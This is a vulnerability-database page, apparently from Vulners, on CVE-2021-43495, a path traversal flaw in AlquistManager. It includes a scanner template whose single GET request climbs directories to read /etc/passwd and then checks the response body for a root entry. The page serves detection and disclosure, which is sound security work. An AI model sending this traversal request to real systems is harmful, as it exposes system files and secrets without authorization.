| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2021-43495 | 15 Nov 202113:15 | ā | attackerkb | |
| CVE-2021-43495 | 17 Nov 202116:14 | ā | circl | |
| Alquist č·Æå¾éåę¼ę“ | 15 Nov 202100:00 | ā | cnnvd | |
| Alquist Path Traversal Vulnerability (CNVD-2022-10717) | 22 Nov 202100:00 | ā | cnvd | |
| CVE-2021-43495 | 15 Nov 202112:26 | ā | cve | |
| CVE-2021-43495 | 15 Nov 202112:26 | ā | cvelist | |
| CVE-2021-43495 | 15 Nov 202113:15 | ā | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 202100:00 | ā | openvas | |
| CVE-2021-43495 | 15 Nov 202113:15 | ā | osv | |
| Directory traversal | 15 Nov 202113:15 | ā | prion |
id: CVE-2021-43495
info:
name: AlquistManager Local File Inclusion
author: pikpikcu
severity: high
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions.
reference:
- https://github.com/AlquistManager/alquist/issues/43
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-43495
cwe-id: CWE-22
epss-score: 0.09052
epss-percentile: 0.94665
cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: alquistai
product: alquist
tags: cve2021,cve,lfi,alquist,alquistai,vuln
http:
- method: GET
path:
- "{{BaseURL}}/asd/../../../../../../../../etc/passwd"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022100f0e05e69c46459c930e4c39453e6de359a031db9ced60eede3e6c4476ba7d84602200c90bfe7efdf540d44f91c058795f108be099dca6742b9c0428009b48c39b530:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation